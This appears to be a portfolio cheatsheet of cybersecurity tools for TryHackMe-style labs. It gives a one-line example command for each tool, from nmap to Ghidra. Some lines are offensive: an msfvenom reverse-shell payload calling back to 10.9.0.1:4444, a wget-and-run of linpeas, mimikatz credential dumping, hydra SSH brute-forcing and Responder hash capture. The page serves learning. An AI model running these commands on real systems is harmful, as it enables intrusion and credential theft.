Visit my portfolio
Cyber-Security Tools Cheatsheet
🔍
📡

Network Utilities

8 tools
pingCLI

Tests host reachability via ICMP. Shows round-trip time and packet loss.

ping -c 4 10.10.10.10COPY

Traces the packet route to a host hop by hop. Use tracert on Windows.

traceroute -n target.comCOPY

Connects to any TCP port in plaintext. Used for banner grabbing and manual protocol testing (HTTP, SMTP).

telnet 10.10.10.10 80 GET / HTTP/1.0COPY
curlCLI

Transfers data via HTTP/S, FTP and more. Essential for inspecting headers and testing APIs from the terminal.

curl -s -L -I http://site.comCOPY
wgetCLI

Non-interactive file downloader. Supports recursive mirroring of entire websites.

wget -q -O file.txt http://10.9.0.1:8000/fileCOPY

Displays active connections, listening ports, and routing tables. Useful for detecting backdoors.

netstat -tulnpCOPY

Sends ARP packets to discover all live hosts on a local subnet. Faster than ping-sweeping.

arp-scan -I eth0 --localnetCOPY

Display and configure network interfaces. ip is the modern replacement for the legacy ifconfig.

ip a ip route showCOPY
🛰️

Port Scanning & Recon

3 tools
nmapCLI

The definitive network mapper. Host discovery, port scanning, OS/service detection, and NSE scripts.

nmap -sC -sV -p- 10.10.10.10COPY

Ultra-fast port scanner written in Rust. Finds open ports in seconds, then passes them into Nmap.

rustscan -a 10.10.10.10 --ulimit 5000 -- -sC -sVCOPY

Active/passive ARP tool to find live hosts on local networks without noisy IP traffic.

netdiscover -i eth0 -r 10.0.0.0/24COPY
🔎

Traffic Analysis

3 tools

Industry-leading graphical packet analyzer with deep dissection of hundreds of protocols.

▶ Click for step-by-step guidehttp → all HTTP traffic tcp.port == 4444 → filter by port Right-click → Follow TCP Stream

Command-line packet sniffer. Captures to .pcap files for later analysis in Wireshark.

tcpdump -i eth0 -n -w cap.pcapCOPY

Terminal version of Wireshark. Read .pcap files and extract specific protocol fields from the CLI.

tshark -r cap.pcap -Y "http.request" -T fields -e http.host -e http.request.uriCOPY
🌐

Web Enumeration

7 tools

Fast directory/file brute-forcer and DNS subdomain enumerator written in Go.

gobuster dir -u http://site.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50COPY
ffufCLI

Extremely fast Go-based web fuzzer. Place FUZZ anywhere — paths, params, headers, subdomains.

ffuf -u http://site.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301 -t 50COPY
dirbCLI

Classic recursive web content scanner with a built-in wordlist. Simple to use for quick checks.

dirb http://site.com /usr/share/wordlists/dirb/big.txt -X .php,.txtCOPY

Python directory brute-forcer with built-in extension support and colored output.

dirsearch -u http://site.com -e php,html,txt -t 40COPY

Web server scanner — checks for dangerous files, outdated software, and misconfigurations.

nikto -h http://site.com -Tuning 9COPY

Fingerprints web technologies — CMS, frameworks, JS libraries, server software — from headers and HTML.

whatweb -a 3 -v http://site.comCOPY

WordPress-specific scanner. Finds vulnerable plugins, themes, users, and configuration issues.

wpscan --url http://site.com --enumerate u,vp --plugins-detection aggressiveCOPY
🌍

OSINT & DNS

5 tools

Queries registrar databases for domain ownership, nameservers, and registration dates.

whois target.comCOPY
digCLI

DNS lookup utility. Queries any record type (A, MX, NS, TXT, AXFR) from any nameserver.

dig any target.com dig axfr @ns1.target.com target.comCOPY

Classic DNS query tool available on Linux and Windows. Good for quick interactive lookups.

nslookup -type=MX target.com 8.8.8.8COPY

Gathers emails, subdomains, IPs, and URLs from public sources like Google, Bing, and LinkedIn.

theHarvester -d target.com -b google,bing,linkedin -l 500COPY

Search engine for internet-connected devices. Find exposed services, banners, and CVEs by filter.

▶ Click for step-by-step guideport:22 country:TN → SSH in Tunisia hostname:target.com → by hostname shodan host 1.2.3.4 → CLI lookup
🧪

Web Exploitation

3 tools

Industry-standard proxy for intercepting, modifying, and replaying HTTP traffic. Core of web app pentesting.

▶ Click for step-by-step guideProxy → Intercept: capture browser requests Repeater: manually modify and resend requests Intruder: fuzzing and brute-force (rate-limited in free)

Free open-source Burp alternative. Active/passive scanning with no brute-force rate limits.

▶ Click for step-by-step guideSpider: crawl and map site structure Active Scan: automated vulnerability detection Fuzzer: test parameters with payload lists

Automates detection and exploitation of SQL injection. Can dump databases, read files, and run OS commands.

sqlmap -u "http://site.com/page?id=1" --dbs --batch --random-agentCOPY
🔐

Brute Force & Auth

2 tools

Fast online password cracker supporting 50+ protocols: SSH, FTP, HTTP, SMB, RDP, MySQL and more.

hydra -l admin -P rockyou.txt -t 4 ssh://10.10.10.10COPY

Speedy parallel login cracker with modular protocol support. Good Hydra alternative for FTP and IMAP.

medusa -h 10.10.10.10 -u admin -P rockyou.txt -M ssh -t 4 -fCOPY
🔑

Password Cracking & Wordlists

4 tools

Versatile offline hash cracker. Auto-detects hash type. Includes ssh2john, zip2john helper scripts.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtCOPY

World's fastest GPU-accelerated password cracker. Supports 350+ hash types and many attack modes.

hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt --showCOPY
CeWLCLI

Spiders a website and extracts unique words as a targeted password wordlist for that specific organisation.

cewl http://site.com -d 2 -m 5 -w wordlist.txtCOPY

Generates wordlists from a character set with min/max length. Useful when the password structure is known.

crunch 8 8 -t Admin@@@@ -o wordlist.txtCOPY
💥

Exploit Frameworks

3 tools

The most widely used pentesting framework. Contains exploits, payloads, encoders, and post-exploitation modules.

msfconsoleCOPY

Payload generator from the Metasploit project. Creates standalone malicious files in many formats.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.1 LPORT=4444 -f exe -o shell.exeCOPY

Offline Exploit-DB search tool. Find public exploits by software name and version without internet access.

searchsploit -x apache 2.4COPY
🐚

Shells & Listeners

5 tools

The networking Swiss Army Knife. Used for reverse shell listeners, bind shells, and file transfers in nearly every THM room.

nc -lvnp 4444COPY

Advanced netcat alternative with SSL, IPv6, and bidirectional streams. Creates fully stable TTY shells.

socat TCP-L:4444 FILE:`tty`,raw,echo=0COPY

Adds readline history and arrow-key support to any program. Makes raw nc shells on Windows usable.

rlwrap nc -lvnp 4444COPY
tmuxCLI

Terminal multiplexer. Split panes, persist sessions after disconnect, and multi-task during pentests.

tmux new -s pentestCOPY
ncatCLI

Nmap's improved netcat with SSL encryption and IPv6 support. Better for encrypted shell communication.

ncat --ssl -lvnp 4444COPY
🪟

Windows & Active Directory

8 tools

Object-oriented Windows scripting shell. Used for enumeration, file transfers, and running post-exploitation scripts.

Get-NetUser Find-LocalAdminAccess Get-NetGroup -GroupName "Domain Admins"COPY

Dumps plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS memory on Windows systems.

privilege::debug sekurlsa::logonpasswordsCOPY

Visualizes Active Directory attack paths using graph theory. Finds the shortest route to Domain Admin.

▶ Click for step-by-step guideRun SharpHound.exe -c All on target Import ZIP into BloodHound GUI Run: "Shortest Paths to Domain Admins"

PowerShell script to enumerate Active Directory: users, groups, GPOs, shares, and trust relationships.

Get-NetUserCOPY

Enumerates Windows/Samba hosts for users, shares, groups, and password policies via SMB null sessions.

enum4linux -a 10.10.10.10COPY

FTP-like CLI for SMB shares. Lists shares and allows browsing and downloading files from Windows servers.

smbclient -L //10.10.10.10 -NCOPY

Poisons LLMNR, NBT-NS, and MDNS broadcasts to capture NTLMv2 hashes on the local network.

responder -I eth0 -rdwvCOPY
🐧

Linux OS Utilities

5 tools

Core filesystem navigation covered in THM Linux Fundamentals. Non-negotiable basics for any Linux work.

ls -laCOPY

Text processing power tools. Used constantly to parse tool output and log files.

grep -r "password" .COPY

Linux permission management. Used when setting up scripts and for privilege escalation checks.

chmod +x script.shCOPY

Archiving and compression utilities. Common in CTFs for handling evidence files and moving loot.

tar -xf archive.tar.gzCOPY

Encoding and hashing utilities. Used to decode CTF hints and verify file integrity.

echo "aGVsbG8=" | base64 -dCOPY
⬆️

Privilege Escalation

3 tools

Linux Privilege Escalation Awesome Script. Automatically finds misconfigs, SUID files, cron jobs, and writable paths.

wget http://10.9.0.1:8000/linpeas.sh -O /tmp/linpeas.sh chmod +x /tmp/linpeas.sh && /tmp/linpeas.shCOPY

Windows equivalent of linpeas. Finds unquoted service paths, weak permissions, and autologon credentials.

.\winpeas.exe quietCOPY

Python toolkit for Windows network protocols. Remote execution, hash dumping, and Kerberos attacks via SMB/NTLM.

psexec.py admin:admin@10.10.10.10COPY
📁

Forensics & Steganography

8 tools

Reads and writes metadata in JPEG, PDF, DOCX, MP3. Extracts GPS, author, camera info, and creation dates.

exiftool -all= image.jpgCOPY

Extracts printable ASCII/Unicode strings from binary files. First step in any CTF binary challenge.

strings -n 8 binary.exe | grep -i "THM{"COPY
fileCLI

Identifies true file type by inspecting magic bytes. Essential when files are disguised with a wrong extension.

file *COPY

Creates hex dumps of files. Used to inspect file headers, identify file types, and spot hidden data.

xxd file.bin | head -30COPY

Scans binaries for embedded files and firmware. Extracts hidden images, archives, or firmware blobs automatically.

binwalk -e file.binCOPY

Embeds or extracts hidden data in JPEG, BMP, and WAV files. Common in THM CTF steganography challenges.

steghide extract -sf image.jpgCOPY

Extracts metadata from PDF files including title, author, creator, dates, and encryption status.

pdfinfo document.pdfCOPY

Leading memory forensics framework. Analyzes RAM dumps for processes, network connections, and injected shellcode. v3 drops --profile — symbol tables auto-detected.

python3 vol.py -f memory.raw windows.pslist python3 vol.py -f memory.raw windows.netscanCOPY
🔬

Malware Analysis & Reverse Engineering

3 tools

NSA's open-source reverse engineering suite. Decompiles binaries to C-like pseudocode. Supports x86, ARM, MIPS and more.

▶ Click for step-by-step guideFile → Import → Auto-analysis → OK Symbol Tree → Functions → double-click main Decompiler pane (right): C pseudocode

Powerful open-source reverse engineering framework, hex editor, and debugger across many architectures.

r2 -A binary pdf @mainCOPY
YARACLI

Pattern-matching tool for malware identification. Write rules with string conditions to classify threats.

yara -r -s rules.yar /suspicious/dir/COPY
🧩

Static Analysis & PE Tools

6 tools

Open-source Windows debugger for 32/64-bit binaries. The standard for dynamic malware analysis. Plugins, scripting, conditional breakpoints. Free alternative to OllyDbg.

► Click for step-by-step guideFile → Open → target EXE F9 Run / F2 Breakpoint / F7 Step Into Right-click → Follow in Dump

Commercial RE platform with HLIL/MLIL intermediate representations and a powerful Python API. Clean UI, strong scripting, and a free cloud version at binary.ninja/cloud.

► Click for step-by-step guideFile → Open → binary View → High Level IL for pseudocode N to rename / Ctrl+F to search functions

PE file editor from NTCore. Inspects and edits PE headers, sections, imports, exports, and resources. Part of the free Explorer Suite — widely used in CTFs and malware RE.

► Click for step-by-step guideOpen PE → Import Directory → inspect DLLs Section Headers → check .text/.data/.rsrc NT Headers → view entry point, image base

Avast's open-source decompiler. Converts PE, ELF, and COFF binaries to C pseudocode. Supports x86, x64, ARM, MIPS. Useful as a second opinion alongside Ghidra.

retdec-decompiler malware.exe cat malware.cCOPY

Identifies file types, packers, compilers, linkers, and protectors. Supports scripting for custom signatures. More accurate and actively maintained than PEiD.

► Click for step-by-step guideOpen file → packer/compiler detected instantly Entropy tab → high entropy = packed/encrypted Strings tab → search embedded text
HxDGUI

Fast Windows hex editor for inspecting and patching raw binary files. Supports disk sector editing, RAM editing, and comparing files side by side.

► Click for step-by-step guideFile → Open → any binary Ctrl+F → search hex bytes or ASCII strings Edit → Overwrite bytes to patch values
🔭

Live Analysis & Incident Response

5 tools

Advanced Windows task manager showing processes, DLLs, handles, network connections, and memory maps. Detects hidden processes and injected code that Task Manager misses.

► Click for step-by-step guideRun as Admin → view all processes + PIDs Right-click process → Properties → Memory Network tab → live connections per process

Sysinternals tool showing a detailed process tree with parent/child relationships, DLLs, handles, and VirusTotal integration for quick malware triage on live Windows systems.

► Click for step-by-step guideRun procexp.exe as Admin Options → VirusTotal.com → Check VirusTotal Find → Find Handle or DLL (Ctrl+F)

Sysinternals real-time file system, registry, and network activity monitor. Captures every system call. The definitive tool for behavioral malware analysis on live Windows.

► Click for step-by-step guideFilter → Process Name → Is → malware.exe Watch File, Registry, Network, Process events File → Save → PML for offline review

Sysinternals tool showing every program configured to run at startup — registry keys, scheduled tasks, browser extensions, drivers, services. Essential for persistence hunting.

► Click for step-by-step guideRun as Admin → scan all startup locations Options → Check VirusTotal.com Uncheck entry to disable suspicious persistence

Industry-standard forensic imaging tool. Creates bit-exact drive images, acquires live RAM, mounts images read-only, and previews file systems without altering evidence.

► Click for step-by-step guideFile → Create Disk Image → select drive Add destination → Expert Witness (.E01) File → Capture Memory → save .mem file

Windows Post-Exploitation

1 tool

Post-exploitation C2 framework with PowerShell and Python agents. Evades many AV solutions using fileless execution. Common in red team operations and adversary simulation rooms.

python3 empire --rest usestager windows/launcher_bat set Listener http executeCOPY
🛡️

Defensive Security Tools

4 tools

Open-source IDS/IPS. Signature-based network threat detection with rules. Can also run in blocking IPS mode.

snort -c /etc/snort/snort.conf -r cap.pcap -A consoleCOPY

Browser-based encoding/decoding toolkit. Chain base64, XOR, hex, hashing, and 300+ operations visually.

▶ Click for step-by-step guideDrag operations into Recipe area Magic: auto-detects encoding type gchq.github.io/CyberChef
capaCLI

Identifies binary capabilities statically — network connections, service creation, registry modification — without running the file.

capa -v malware.exeCOPY

Industry SIEM platform. Searches and correlates log data using SPL. Covered in THM defensive security rooms.

▶ Click for step-by-step guideindex=main "Failed login" | stats count by src_ip | sort -count | head 10 earliest=-24h — time range filter
🔒

Cryptography

3 tools

Crypto toolkit. Generate keys, create certificates, encrypt/decrypt files, and test TLS connections.

openssl s_client -connect site.com:443 openssl enc -aes-256-cbc -salt -in file.txt -out file.encCOPY

Implements the PGP standard for asymmetric encryption and digital signing. Covered in the THM Public Key Cryptography room.

gpg --import public.key gpg -e -r admin@10.10.10.10 secret.txt gpg -d secret.txt.gpgCOPY
SSHCLI

Encrypted remote shell protocol. Connects to THM machines and supports tunneling for port forwarding and pivoting.

ssh admin@10.10.10.10COPY
🧰

General CLI Utilities

3 tools
vim / nanoCLI

Terminal text editors. nano is beginner-friendly; vim is faster for experienced users. Both appear in THM Linux rooms.

nano file.txtCOPY

Go-to scripting language in CTFs. Used for quick file servers, exploit scripts, and shell stabilization.

python3 -m http.server 8000 python3 -c 'import pty;pty.spawn("/bin/bash")'COPY

Scheduled tasks and service management. Weak cron jobs are a classic THM privilege escalation vector.

crontab -l cat /etc/crontabCOPY